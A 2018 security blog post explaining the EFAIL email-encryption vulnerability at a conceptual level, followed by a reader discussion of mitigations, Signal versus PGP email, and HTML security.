Details on a New PGP Vulnerability

A new PGP vulnerability was announced today. Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. Essentially, if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.

A few initial comments:

1. Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, but is hard for the average hacker. That being said, there are circumstances where someone can modify e-mails. I don’t mean to minimize the seriousness of this attack, but that is a consideration.

2. The vulnerability isn’t with PGP or S/MIME itself, but in the way they interact with modern e-mail programs. You can see this in the two suggested short-term mitigations: “No decryption in the e-mail client,” and “disable HTML rendering.”

3. I’ve been getting some weird press calls from reporters wanting to know if this demonstrates that e-mail encryption is impossible. No, this just demonstrates that programmers are human and vulnerabilities are inevitable. PGP almost certainly has fewer bugs than your average piece of software, but it’s not bug free.

3. Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today’s announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.

I’ll post other commentaries and analyses as I find them.

EDITED TO ADD (5/14): News articles.

Slashdot thread.

Posted on May 14, 2018 at 1:36 PM95 Comments


Questionair May 14, 2018 2:18 PM

Sorry for my ignorance but if i am allowed a question:

What are the implacations for all the phones marketed as secure pgp phones?

Bruce Schneier May 14, 2018 2:25 PM

“What are the implacations for all the phones marketed as secure pgp phones?”

No idea.

Are there any left?

And weren’t those using PGP Voice, not e-mail?

Nightwish May 14, 2018 2:45 PM

Wait, the issue is that all the clients don’t split on the boundary before rendering? Read your RFCs, guys, even the web fixed this.

Clément May 14, 2018 2:45 PM

I think you might be mischaracterizing part of the attack: it doesn’t require modifying messages in transit. It only requires passively listening on outgoing messages to collect ciphertexts, and then sending a crafter HTML message to the victim.

Sergey Babkin May 14, 2018 3:01 PM

It’s strange that yesterday EFF was publishing instructions on how to disable PGP while it should be sending instructions on how to disable the HTML processing (easy to do in Mozilla Thunderbird).

Grant May 14, 2018 3:06 PM

Regarding #3:

Why is anyone using encrypted e-mail anymore, anyway?

I personally do and have been using S/MIME certificates for email signing and encryption for a number of years. I’m quite happy with it. I’ll still continue to use it despite #EFAIL.

I use S/MIME encryption between my personal and work email address and other friends. We are looking for an easy way to communicate (at our leaser) that does not rely on 3rd party service (Trusted certs aside) for our communications so that casual observers and automated filtering systems can’t tell what we are discussing.

I prefer S/MIME over PGP/GPG because of it’s integration with most MUAs in the last ~20 years. I can spend < 15 minutes setting up my dad’s iPhone and then we can exchange encrypted email without him being any the wiser. He literally has no functional change in his end user experience. PGP/GPG has never come as close to that.

IMHO S/MIME and PGP/GPG work perfectly fine for what most people (that care) need or want. Many people don’t care enough to set it up. Some people want something stronger than S/MIME or PGP/GPG, though I suspect they aren’t using email (over the Internet) in the first place.

Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today’s announcement.

I do not believe that encrypted e-mail is insurmountable. I feel that S/MIME and PGP/GPG can get good enough for what most people would want. — If you want something better, use a different solution.

Note: I want what ever solution I use to support store-and-forward communications methods. I do not want to have to rely on (near) real-time communications to establish an encrypted channel.

Finally: I believe in raising the noise level for those that really do need to hide their signal in the noise. Let my wife’s email reminder to pick up the milk on my way home help a civil rights activist adjust the signal-to-noise ratio ever so slightly more in their favor.

George H.H. Mitchell May 14, 2018 3:19 PM

Strongly agreeing with Grant’s comment above. PGP with Thunderbird plus Enigmail is far from “an insurmountably hard problem […]”. And Thunderbird is happy to disable HTML for you.

Glenda May 14, 2018 3:26 PM

Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today’s announcement. If you need to communicate securely, use Signal.

Shouldn’t that quote read “Why is anyone using e-mail anymore?” Because why should anyone have to consider whether they “need to communicate securely”? People are not good at threat-modeling. Privacy is a right, and if it’s impossible to have private e-mail, we should scrap e-mail altogether. Once we admit defeat we can try to come with a proper solution—something federated and not controlled by one company, and that protects the metadata.

James May 14, 2018 3:50 PM

The problem is real. But, given this:
(i have no idea if this is real anyway), there are some e-mail clients that are not vulnerable. I never liked external content or flashy s..t in the e-mail anyway , just plain old text and maybe attachments. Myself i have blocked external crap in the e-mail like since forever (not only encrypted e-mail, but all e-mail). Loading external crap exposes you to a laundry list of threats, this PGP/GPG exploit is just one of them.

This reminds me of the PDF fiasco … PDF was supposed to be, well, a Portable Document Format, until they started adding crap to it. Images, videos, external content and other flashy s..t. And it became an unfixable nightmare …

James May 14, 2018 3:52 PM

As a side note, “public key” or not, usually you use encrypted communication with people you do know/trust …

Gerard van Vooren May 14, 2018 3:52 PM

@ Ratio,

Let’s get this straight: Tomorrow we will all know. That’s all.

Bruce Schneier May 14, 2018 4:01 PM

@ lisaev:

“Bruce, please don’t spread misinformation. There are no bugs in PGP, only in email clients mishandling warnings from GnuPG.”

Agreed. I believe I said that this is not a bug in PGP. That is what I meant to say here: “The vulnerability isn’t with PGP or S/MIME itself, but in the way they interact with modern e-mail programs.”

Bruce Schneier May 14, 2018 4:03 PM

@ Roger Nebel:

“Don’t send html – problem fixed.”

It has nothing to do with whether the sender sends HTML. It has to do with whether the attacker sends HTML, and how the e-mail recipient handles it.

James May 14, 2018 4:09 PM

@Bruce: My point exactly, the e-mail client should not handle it at all. Text.

Andy Sherman May 14, 2018 4:14 PM

The issue is really that many MIME implementations do a lousy job of error checking. An unterminated quoted strings should be rejected or forcibly closed at the end of the part.

There are hosts of MIME issues that should be de-fanged before allowing any interpreter (such as HTML) to process the text. Add this to the list.

Sancho_P May 14, 2018 4:16 PM

I don’t mean to split hairs, but …
Why is the headline “… New PGP Vulnerability” when it is a vulnerability of rendering HTML emails?
Btw, when was the old PGP vulnerability, just to refer to?

John Poffenbarger May 14, 2018 4:27 PM

Don’t use email? Why not? We have solved this problem and are not vulnerable to this type of attack. The features of a mature client like Outlook obliterate the limited abilities of Signal and WhatsApp. Instead of calling it bad and saying don’t use it, how about recognizing there is in fact a viable solution instead.

James May 14, 2018 4:32 PM

@Andy Sherman , @Sancho_P, @John Poffenbarger: E-mail was not designed to “render” anything. It was designed just as a “dumb” method of sending messages, text messages. Then, someone got the idea to complicate things. Somehow similar to PDF …

James May 14, 2018 4:46 PM

All being said, this is not an encryption issue. This is an implementation issue… What makes this worse then some remote execution / privilege escalation bug ? Does anyone read the monthly security bulletin from Google, with the laundry list of vulnerabilities discovered and patched every month ? What makes this any more dangerous then the others ?

Sancho_P May 14, 2018 5:45 PM


My point only was why to name “PGP” together with “vulnerability” here.

James May 14, 2018 5:49 PM

Sancho_P: probably because the exploit does the most damage to pgp … technically clear text e-mail should not be considered secure, but encrypted one should …

Name required May 14, 2018 6:28 PM

Why is anyone using encrypted e-mail anymore, anyway?

I find it easier to get an anonymous email address than an anonymous phone number (for Signal), at least in my country. Also, many people like journalists only publish an email address and public key with no Signal number, so that is not always (or even often) an option.

Bruce Schneier May 14, 2018 6:36 PM

@ Sancho_P

“Why is the headline ‘… New PGP Vulnerability’ when it is a vulnerability of rendering HTML emails?”

Because that’s how it is being talked about in the press, and that’s how people will search for this topic.

Thoth May 14, 2018 6:43 PM

@all, Clive Robinson

I see this same old debate appearing again and it’s usually framed as Signal vs PGP Email or Encrypted Chat vs Encrypted Email.

The same answer and the same stark truth is that both Signal and PGP are insecure in every sense.

As I have always cautioned, your phones (iPhones, Androids et. al.) are already containing the perfect backdoor to trap you and for that I have demonstrated a theoretical exercise by creating a Firmware based Clipper using just the ARM TZ in your phones in one of the Friday Squid post.

Go ahead and happily use Signal while the fClipper exflitrates all your Signal keys 🙂 .

That being said, the architecture of OpenPGP is not without it’s quirks which really requires an update.

End of the day, it is not the crypto-protocol that the attacker will try to break bht by attacking the underlying systems and bubble up attacks which has become the choice of attack these days.

The likes of Spectre and Meltdown and the continued peddling of snake oil security wilfully by security companies and the likes of Intel that insistently claim that their Intel SGX is still secure despite all the latest new Spectre attacks and trying to push sales and lie to the public wilfully and trying to play down significance of the attacks.

Use Signal instead of PGP ?

I wish that were true and @Clive Robinson, the recent Friday Squid I posted about some vulnerabilities in Signal.

I should recommend staying off Signal and PGP unless you know what you are dealing with as most people pin false hope on them.

People might hate me for the above recommendations but I prefer people to not have false hope and do things that dont understand.

If you have something truely important, meet in person and discuss in private.

Dean May 14, 2018 6:46 PM

James, re: PDF

Before PDF, PostScript (also designed by Adobe) was the standard printing language. It’s a Turing-complete stack-based programming language, and this aspect later proved to be problematic; when Adobe designed PDF to replace it, they intentionally made it non-Turing-complete. That decision should have remained for all time…

… …But, when these events were obscured by the mists of time and became legend…

Jack May 14, 2018 7:09 PM

Correction: the 2nd #3 should be #4

Not that big of a deal, but if you like to be correct… 🙂

Thoth May 14, 2018 7:10 PM

@all, Clive Robinson

As a continuation from my above post and also a possibly off-topic but a related note to “security technology”, these “Secure Enclaves” are built against us.

If we look at it’s original intend for all the “Secure Enclaves”, they are built to protect against the user, not to protect the user.

The original intent of these “Enclaves” are for DRMs, licensing and for big corporations to control us and how we interact with our devices and contents. It is essentially putting us in a digital prison and them against us via the “Enclaves” as a medium.

There are proposals to use these “Enclaves” to make digital communication (Secure Chat and Email) more robust but without taking into consideration that these “Enclaves” with their original intent to be used against it’s users, there is no chance of any secure communication using your COTS devices unless you take additional steps that @Clive Robinson, Nick P, myself, maqp and many regulars have recommended to energy and air-gap all these devices and manually “walk” the cipher text and plain text from dedicated machhines and transmitters.

The architecture and design of “Encalves” are to be used against us and what gives us the confidence that by using these “Enclaves” we can secure ourselves against it’s original design and intentions via building secure communication solutions on top of it ?

bob May 14, 2018 7:51 PM


I will add my voice to what others have said, i communicate exclusively with encrypted email. I know im one in a million, my point is email does have significant advantages over signal or whatsapp. You should know, the eff has recently released a paper re-evaluating their private communication tools scorecard, pointing that people dont like giving their phone number as an identifier. An you yourself said phone numbers are better than social security numbers for identifying people. Me? I dont even own a phone.

Nick P May 14, 2018 8:14 PM

@ Bruce

“Why is anyone using encrypted e-mail anymore, anyway? ”

Easy: the Snowden leaks said NSA couldn’t hack it whereas they were smashing mobile platforms. That’s the highest level of attacker. If they can’t handle it or only rarely can, then I should be safe against most of the others with less resources, too. Now, how difficult is it to use? I was using a cheat sheet to remember the commands. Just a few of them. Encrypt a text or zip file for specific person’s email. Decrypt it with shorter command. Tedious, but simple. I scripted the harder parts. Tells me a usable front end could be made.

Now, that’s not the end of the benefits. GPG runs on a lot of platforms vs the two or three Signal is on. You can get an obfuscation benefit out of that one where your opponent isn’t quite clear on what you’re using. This works even better if there’s a simple device in front of it acting as a guard making sure incoming data only goes to specific apps instead of host OS as a whole. It also just requires terminal, text editor, and zip for my method. One could delete most of the code in the kernel and userlands with it still a usable solution.

Vuln in Implementation, Not in Encryption May 14, 2018 10:10 PM

@Nick P :

Encrypt a text or zip file for specific person’s email. Decrypt it with shorter command. Tedious, but simple. I scripted the harder parts. Tells me a usable front end could be made.

Certainly. When I worked for a demographics firm that received and sent plenty of datafiles from client firms each day, I built a tool that let other tools’ users submit a simple plaintext file to a certain folder on a server. That textfile contained just “encrypt” or “decrypt”, the path and filename of a datafile on any of our servers, a client’s passphrase if needed, and the name of the client’s public key stored on another of our servers.

My tool read the simple textfile (one line per datafile, you could do batches with a multiline textfile), prepared a proper PGP command, executed it with error-checking, and cleared the working memory so an intruder couldn’t harvest the data unless they compromised the actual processing.

So our toolbuilders doing various tasks could automate their encryption/decryption for various tasks just by having each tool write the simple plaintext file and post it to the working folder. The purpose might be a project manager just verifying an input record count; or a standard-production tech running a datafile through a standard processing tool, and preparing the output for delivery; or a custom programmer doing one-of-a-kind processing and preparing the output. Each worker, and even each toolmaker, didn’t need to know the details of PGP commands.

In practice the security depended mainly on the project managers working with client reps to exchange public keys and passphrases without using the same channels as the encrypted datafiles. (And not working from home, leaving written notes where they could be stolen, et cetera.) Any key-based system has those risks. This system took all the hard-to-remember parts out of everyone’s workflow while adding hardly any new vulnerability.

You could easily do this for the body of ordinary e-mails using a plain desktop PC or even a powerful smartphone. Then you would just have the key-distribution problem that exists with any PKI among a group that can’t meet in person once to exchange keys.

Gunter Königsmann May 14, 2018 11:32 PM

The real problem is that thunderbird is willing to automatically load external objects into mails without even asking and that it is both possible to add text to the mail before and after the encrypted part (including something that looks like the “this mail is encrypted” sign) and can even span tags from there to the encrypted part and can add things to the encrypted part with most mail programs ignoring the “checksum has changed” message. While we are at it: creating conterfeit keys with the right fingerprint is easy.

Gunter Königsmann May 14, 2018 11:44 PM

Free extra vulnerability: Create an address that looks like the real thing using weird unicode chars and trick someone to believe that this is the real thing. Is one of the rare cases that makes you a man-in-the-middle without requiring you to own the infrastructure.

Hmm May 15, 2018 12:44 AM

People chiding Bruce may not have noticed how suddenly and forcefully this was initially reported or how quickly the specific details have developed. It was reported as a PGP issue because those were the folks being affected, and they had to take some immediate action to protect their data regardless of where the actual gremlin lived. Not everybody using HTML+remote images gives a flying crap about their email security, (duh) but presumably those going to the trouble of PGP do care, right? So when those all caps dire warnings came out and Bruce dutifully passed them along to the blog for obvious reasons, to then poke him for ‘disinformation’ or such because the issue subsequently turns out to be trivial or limited to certain conditions is both late to the pool party and not wearing their swimsuit properly.

safetonysteemit May 15, 2018 1:07 AM

Sorry Bruce but I think this is fairly irresponsible journalism, It is not correct to call Efail a new vulnerability in PGP and S/MIME. This has been known since 2001 and it is to do with client side implementation.

What is troubling is that EFF told people to stop using PGP encryption the correct response would be to turn of html and remote content in emails and use a client that actually does an integrity check on the message.

Hmm May 15, 2018 1:49 AM

“Me? I dont even own a phone.”

Just how does that work, Bob? Pseudo-random hollering?

“you yourself said phone numbers are better than social security numbers for identifying people.”

You can get a new prepaid phone number trivially, but if you’re looking to not be advertising your presence why would you want to carry a radio beacon around everywhere you go anyway?

It’s a similar question to those who would be using HTML and remote images with PGP email.
If you’re trying to achieve a secure communication, why allow loose remote HTML junk on top?
You want to wear all white? You can, but stop eating sloppy joes on the bus.

Hmm May 15, 2018 2:13 AM

‘What is troubling is that EFF told people to stop using PGP encryption’

What they actually did say was stop using PGP encryption until they updated their security.

In this case the fix is simply turning off remote images / html, so there’s your security update pal. You’re welcome for the heads up if not 100% optimal off the bat.

Meanwhile, you got a warning that sought to prevent complete data compromise from an active exploit to a sensitive data source, perhaps one of the most sensitive data sources widely accessible on the internet as a whole. So as “wrong” as the EFF was you’re not reading it in the correct light. Anyone who uninstalled PGP in the interim and updated it (as above) as the EFF actually said is doing just fine, right now. If they had their wits about them they wouldn’t even have changed keys, no loss at all.

If you’re going to shoot the messenger don’t miss, Jesus.

I hate filling names May 15, 2018 3:09 AM

I’ve read the paper and it all depends on bypassing message fingerprint check. Everything that is not covered by fingerprinting and encryption should be discarded without mercy. I think they underestimated importance of message fingerprinting.

James May 15, 2018 4:05 AM

Guys, remote content in e-mail should be disabled by default, period, encryption or no encryption. It exposes you to trackers and other nasty stuff. Especially for a secure email you do not need all the flashy crap that remote content can bring.

I don’t like Signal either, because it requires a phone number. However Signal protocol != Signal. There are other apps out there that use the Signal protocol / OMEMO and do not require a phone number. One of them is Conversations that can be used with any XMPP server. Technical users can host their own …
Of course this is null and void if one endpoint gets compromised.

Thoth: Secure enclaves / TEE are basically built to protect the user from the user. It allows you to use a weak pin code and enforces a hardware delay against brute forcing (until it doesn’t, see Graykey). They are also used for hardware key derivation, random generation, probably DRM and a lot of other stuff. Verified boot has it’s advantages, as someone cannot change your system partitions without you noticing. However, you do not have to trust all this. Using a complex passphrase is the best practice, no matter the hardware. Speaking of DRM, show me an implementation that hasn’t been broken …

Hans May 15, 2018 5:13 AM

Why is anyone using encrypted e-mail anymore, anyway [..] use Signal.

Cool, so you will soon replace the gpg key on your contact page with a signal phone number? Can’t wait.

On a more serious note: I saddens me, how everyone is just using this occasion to trash the heroic efforts of all the people seriously concerned with improving the confidentiality of e-mail, while offering nothing in return. We do have an e-mail infrastructure, it is used, and we won’t replace it with some messenger silo. Solving confidentiality in a federated world is a hard research problem, and we should work on it, rather than tell people to stop communicating.

echo May 15, 2018 5:47 AM


This incident sounds like the patient/victim blaming that happens in UK healthcare. Blaming or framing the issue as a PGP issue (i.e. patient issue) instead of an email application issue (read: doctor issue) and external services issue (read: bad communication between departments issue).


“Silos” are bad because they wrap up abuse behind an unnaccountable and closed door.

I have to say on reflection I disagree with Bruces framing of this issue. The problem seems more akin to a professional practice problem and you have to ask why organisations with deep pockets are ignoring this. Mozilla is so bad they even tried to offload Thunderbird until there was pushback.

Clive Robinson May 15, 2018 6:06 AM

@ All,

You realy should stop using HTML, especially HTML5 if you value any kind of security…

The reason is a mixture of “mission creep” and “feature creep” by the W3C.

I confidently predict a whole landslide of security issues from HTML especially HTML5 to happen over the next decade.

Thus the easiest way to avoid them is not to “buy into the ‘HTML everywhere’ hype”.

That is there is no “one solution” to the vast variety of technical problems out there. You only have to look at things that have been depreciated like Flash and Java and their histories to see why they should not be used the way they were thus creating a myriad of security vulnerabilities. Put simply the idea of “sand box” security to execute unknown code on your local machine was one of those “Fine in theory, dire in practice” issues. The more secure way of doing things is for the remote server to “do the work” then security vulnerabilities in their coding are their issue, not yours.

If we want to be secure then the likes of javascript etc need to be removed from the likes of Web-browsers, likrwise aroind 3/4 of HTML5 should never have been dreamt of let alone put in the W3C working considerations.

The way to be secure is a lot more involved than “encryption” it involves the correct managment of three fundemental concepts,

1, Information communication.
2, Information processing.
3, Information storage.

Not just independently but together and especially at the interfaces where “choke point” control is most effective at segregation as well as managment.

In the past we have talked about “The CIA triad” of,

1, Confidentiality.
2, Integrity.
3, Authentication.

Unfortunatly when you think about it these are “human ideals/values” that we then try to mangle into the way Information Processing, Storage and Communications work.

Mistakes will happen, frequently quite deliberatly by design. Most often this happens at the interfaces, usually because they are frequently incompleate and thus made too permisive to get what users consider acceptable functionality. What users consider “acceptable functionality” is a compleate disaster area awaiting to happen.

As others have pointed out even at the lowest levels HTML breaks the secure communications, storage and processing requirments. Thus hemorrhaging side channel information to both active and passive adversaries. It also bypasses all three of the CIA triad. Thus you would have thought alarm bells would ring in more than just one or two peoples heads…

And that’s all before including “interpretation” of complex data objects and code, that are all Turing compleate or allow unauthorized behaviour of a local resource by second or worse third party control (think malware in revenue raising adware).

In short outside of it’s limited original design “HTML et al is a solution looking to make problems” not “a solution to solve problems”. Oh and it gets worse with every supposed “functional improvment” added by the W3C at the behest of others with short sighted goals that in no way include user security, in fact the very opposite because breaching user security is where their profit comes from…

Givon Zirkind May 15, 2018 6:06 AM

Interesting and practical. Why encrypt email? Irrespective of the failure of current encryption methods, the reason people want to encrypt email is…privacy.

As to the method of attack, brilliant. The weakest link. If you can’t go after the target, go around, under, get at a support. PGP is good. That isn’t the problem. Once the PGP encryption is removed then, you can get a copy by attacking the comm service, so to speak. Cute trick & method.

Practically speaking, why not just turn off HTML email, like never demanding resumes in text format?

Denton Scratch May 15, 2018 7:24 AM

@Clive “”HTML et al is a solution looking to make problems” not “a solution to solve problems”.”

Not sure who you were quoting, Clive; but whatever.

I disagree. For the most part, HTML5 doesn’t solve problems that are problems for me (the exception in my case is the media tag). But it does solve a lot of problems for one very large and powerful constituency: web marketers and advertisers. For that group, the insecurities in HTML5 are a feature, not a bug. It’s them that pushed HTML5 in the W3C, and when that failed (or made progress too slowly) they formed the WHATWG.

Hmm May 15, 2018 9:10 AM

HTML 5 exists where flash was the ubiquitous standard.

So let’s complain with that in mind at least.

5 is unlikely to outpace flash in terms of free gifts to malware devs in the near term.

UseSignal May 15, 2018 9:25 AM


There are other apps out there that use the Signal protocol / OMEMO and do not require a phone number. One of them is Conversations that can be used with any XMPP server. Technical users can host their own …

I will never get why some people always bring Conversations/XMPP into play when there is a discussion about secure messaging.

There is unencrypted fallback, finding “the right” server for you and your friends is a PITA, many server operators don’t even provide a privacy policy and XMPP servers store all of your contacts, group memberships and much more in plain text (even if you enable OMEMO and OMEMO is still experimental and not standardized).

Hosting your own server to solve this big privacy issue implies that you really harden your server configuration and hope that no one hacks you. However, all of your friends must be on the same server to control all of your data.

Btw: Yes, you need a phone number to use Signal. You can use an arbitrary phone number, though. This includes “Receive SMS” online services which one can access using TOR. Far more privacy-friendly than using experimental encryption with servers that know everything about you.

vensi May 15, 2018 9:38 AM

I’m definitely not implying that Signal is bad, but it seems like a bad suggestion when people say “don’t use encrypted email, use Signal”. There are several reasons I would prefer not to:

1- Signal requires a Phone Number and the signal app can only be signed into one phone at a time. I’m not publishing a single phone number to the entire public web and than having it tied indefinitely to my phone.

2- Signal requires a phone. Consumer email is free. Even privacy conscious providers offer free versions that you could layer PGP on top of.

3- Rotation. Every time I want a new Signal number I would need to buy a new sim card, pop it in, and pay for it for the entirety of use. This is also assuming that I’m ok with the possibility that the phone number is re-issued after I get rid of the number.

TLDR- Signal’s primary weakness is its reliance on a phone and phone number.

Clive Robinson May 15, 2018 9:39 AM

@ Denton Scratch,

I disagree. For the most part, HTML5 doesn’t solve problems that are problems for me…

Er did you read what I wrote?

Because the rest of your comment is broadly the same as my last paragraph, so I’m not sure what it is you disagree with?

gmgj May 15, 2018 9:52 AM

A little off topic, but, I would be really happy if a few really smart guys got some backing to do a new email framework, standard, what you may call it along with some open source libraries. On the other hand, I think the computer security world should shift its focus from trying to get it perfect, to getting people to start using existing technologies and to committing to be responsive to needed changes.

The benefits of using the existing technologies outweigh the potential cost of their being exploited. There are billions of dollars being lost in fraudulent transactions every year using existing safeguards. If we believe we can totally prevent fraud, we are sadly mistaken. If we believe we will find a one size fits everything solution, we are sadly mistaken. No matter what, some people will still manage to shoot themselves in the foot, despite the safety.

Clive Robinson May 15, 2018 10:04 AM

@ vensi,

TLDR- Signal’s primary weakness is its reliance on a phone and phone number.

Whilst this is true, you left the most important reason Signal is in effect a usless product security wise.

Signal is an application designed to run entirely on the phone. Whilst it offers what appears to be a very very secure comms channel, it also puts the plaintext interface on the users phone.

History shows us through the likrs of the CarrierIQ debacle and several unrelated malware attacks, that getting at the plaintext output of applications that run entirely on a mobile phone or connected smart device is fairly close to “childs play” when compared to breaking the crypto.

This sort of attack is known as an “end run attack” because it reaches around the applications security end point and accesses it’s plaintext interface. This is a prefered method of attack where the attackers communications end point is beyond the applications security end point.

Thus Signal has a glaringly obvious and well known security fault that can not be fixed by it’s users currently. Thus it is more of a danger to privacy than a protector of privacy, because Signal traffic stands out and therefore acts as a red flag to state level attackers.

The solution to Signal’s glaring security weakness is,

    To extend the users security end point beyond the attackers communications end point.

Currently the only way for users to do this with Signal is to actually use an off device cipher or code then put this through Signal. If the cipher or code is sufficiently strong (say an OTP) then and only then will Signal be secure in use.

lucas May 15, 2018 11:12 AM



blockquote>A little off topic, but, I would be really happy if a few really smart guys got some backing to do a new email framework, standard, what you may call it along with some open source libraries.



A new “framework” might be overkill. There are individual problems that could be solved by a small group of experimenters, while remaining SMTP-compatible. The GnuPG developers already have DNS-based proposals for end-to-end key distribution, and we can use DNSSEC to make that secure.

To hide metadata, we could use TCP-DNS over Tor to look up a .onion domain corresponding to the “real” recipient domain, then send mail to it via SMTP (the recipient might authenticate the sender similarly, via DNSSEC based on their domain). The Tor developers could additionally let people associate a nameserver with a .onion domain, to allow ICANN-independent mail.

M May 15, 2018 12:23 PM

@Clive Robinson

regarding “end run attacks”: doesn’t this apply to any means of communication which displays the unencrypted text on a screen? Getting a “screenshot” from a desktop system is actually easier than on a mobile device (so is probing other programs etc. to know when to take the “screenshot”).

RealFakeNews May 15, 2018 12:38 PM

Don’t encrypt/decrypt within the e-mail client?

What did I miss here?

The e-mail client has always been a security vulnerability, and I consider it as insecure as a web browser.

E-mail is good and de-centralized, and just pushing Signal (or worse, WhatsApp with its known privacy problems) is no solution at all.

I’m quite surprised at @Bruce Schneier and how he has posted on this issue.

Would someone please develop a basic browser and e-mail client without the junk? I can only surmise the browser and e-mail devs are on the payroll of the ad companies.

Jeffrey Deutsch May 15, 2018 7:14 PM

Gmail encrypts email — at least to and from certain domains. How secure do you think it is?

justinacolmena May 15, 2018 11:18 PM

Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, …

“The NSA” again. Ix-nay.

The vulnerability isn’t with PGP or S/MIME itself, … “disable HTML rendering.”

Sure. Problem solved.

Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today’s announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.

WhatsApp is from Facebook, which cracked the TOR protocol allegedly with massive computing power to create a vanity onion http://facebookcorewwwi.onion/

“Signal” is free and open source software. Nothing at all to arouse suspicion. There is no reason for me to believe that Signal would be secure in a situation when PGP-encrypted email allegedly is not.

Is there Perfect Forward Secrecy to the Signal app protocol? If so, I would like more discussion of the technical details.

Patriot May 16, 2018 3:57 AM

@ Clive Robinson

“You really should stop using HTML, especially HTML5 if you value any kind of security…”

True; this is just more evidence of a salient, ugly fact: generally, you cannot trust modern cryptography as it is offered to the masses. The math might be sound, but the implementations are easy to subvert.

Sancho_P is technically right in his banter above–this latest fire drill is not a weakness in PGP per se–but Mr. Schneier was just trying to make the message simple for the layman, something he is good at. Use what labels you like, the systems are unreliable.

Notice that Mr. Schneier’s support for Signal is not uncategorical. When he says that he uses it, that gives people confidence. He recommends it, but it is not absolutely secure.

@ Mr. Schneier

“Why is anyone using encrypted e-mail anymore, anyway?”

Because, from the viewpoint of attacker, that mobile device is a wonderful gift full of goodies, not to mention lots of metacontent. It cannot be secured. It constantly emits electrons, the enemy of privacy and anonymity. It’s a security disaster in your pocket.

No one is talking about encrypting off-line in a cascade, which is a way that works. It is easier to encrypt off-line with an air-gapped computer, and move the ciphertext in a way that breaks the trail of electrons, than to use a phone in the same way. It is also easier to use steganography. True, not many law-abiding people need that level of security, but there are some.

Things that work are proper one-time pads and/or strong PGP keys on air-gapped systems and/or symmetric encryption with a strong passphrase used in the same manner. Or all of the above together. When cryptogeddon arrives expect that PGP traffic/symmetric with passphrase is likely to be broken. In point of fact, we do not know whether that day has not already arrived.

If anyone wants to send some traffic and have it really remain confidential, it has to be properly encrypted/decrypted to/from secure endpoints, and that means going off the grid.

Depending on encrypted email alone is not enough, nor, for some, is depending on Signal, which is clearly more compromising in several important ways.

James May 16, 2018 4:43 AM

@UseSignal: Conversations is just an example. Using end to end encryption means that you don’t really need to trust the XMPP server, which does have access to your contacts and metadata. What i said is just an idea, far from perfect (just like everything else). Same old compromise between security and convenience.

Myself i don’t want to rely on a phone and a phone number, period, and i want to access my chats from both mobile device and computer. Yeah, getting a SMS enabled phone number is easy. But still, i don’t like it. That’s just me.

Signal is a nice piece of software, was checked by several cryptography experts, i think it’s solid. Maybe at some point they won’t require a phone number though.

Clive Robinson May 16, 2018 5:53 AM

@ M,

Regarding “end run attacks”: doesn’t this apply to any means of communication which displays the unencrypted text on a screen?

Yes it applies to any system –not just Signal– where there is insufficient functional segregation. And either the plaintext or KeyMat can be seen by an attacker that can get some kind of communications path to it. It’s a “red flag” I’ve been waving here and other places for quite some time.

It’s why I talk about the “security end point” needing to be moved off of the device that is part of the communications path available to an attacker.

To put it more formally you need the security end point segregated from the communications end point and any transfer to be via a mandated choke point.

In effect you do encryption and decryption on an entirely seperate system/device that does not have any kind of communications outside of the minimum mandated for the transfer of cipher text to the communications end point. Further the choke point is designed to be transparent to the user such that they can see attempts by an attacker to reach across the choke point.

This is a hard thing to get right and one of the reasons the likes of TEMPEST / EmSec approved equipment is so expensive. As closing down all inadvertant side channels means using various gapping technologies and significant testing.

It is fairly safe to say that no single consumer device is in anyway meaningful way secure from the likes of end run attacks. They lack any kind of effective segregation internally. Which means all consumer or COTS “Smart devices” and more traditional computers are not sifficiently secure to be both communications and security end points.

To be secure with consumer / COTS systems means using appropriate gapping technology to establish full segregation, then carefully put in place a manfated choke point of some form.

The simplest way to do this would be for users to have a secure pen and paper cipher or code (such as the One Time Pad or One Time Phrase systems). They write the incoming cipher text displayed on the communications end point device, and walk away out of range of any cameras, microphones etc. They then decode the message with the OTP think of a reply, hand encrypt/encode it. Then destroy the pieces of paper with plain text or KeyMat on. They then take the reply ciphertext/codetext back to the communications end point enter it and then send it.

Whilst that might sound a lot of work, it’s the way many secure field systems work even today.

Not maintaining good segregation/seperation via appropriate methods such as gapping is the simplest way to alow your adversary to read your plaintext or KeyMat. Esspecially when you consider that with most modern communications and computers you nolonger “own them” somebody else does. Be it via a SIM or Security Enclave that alows the supplier of the service, device or OS to “set policy” over anything the user might decide…

However very few people can maintain the required level of discipline to continuously practice the level of OpSec needed to keep the security in place.

One area this happens with is Key Managment (KeyMan) certain secure systems are also quite fragile. The One Time Pad has little or no security when the KeyMat is reused in part or in whole, so KeyMan has to be practiced very vigorously at all times no matter how fast messages need to be sent or how tired the operators are…

Clive Robinson May 16, 2018 6:40 AM

@ Patriot,

It is becoming clear to increasing numbers of people that our information systems be it for communication, processing or storage are becoming more and more “insecure by design” at all levels in the computing stack.

It realy does not matter if the insecurity is by deliberate design or the inadvertant consequences of “complexity” or more likely “usability” or some other perceived “marketing advantage” such as “speed” or “Bang for your buck”. Any insecurity once known to certain people will be used as “a crack to put the point of a wedge in”.

One of the downsides of even moderate complexity is working out where an insecurity lies and why it is insecure. This is especially difficult when “interoperability across an interface” is involved. Especially if the designers of the systems on either side of the interface are unrelated.

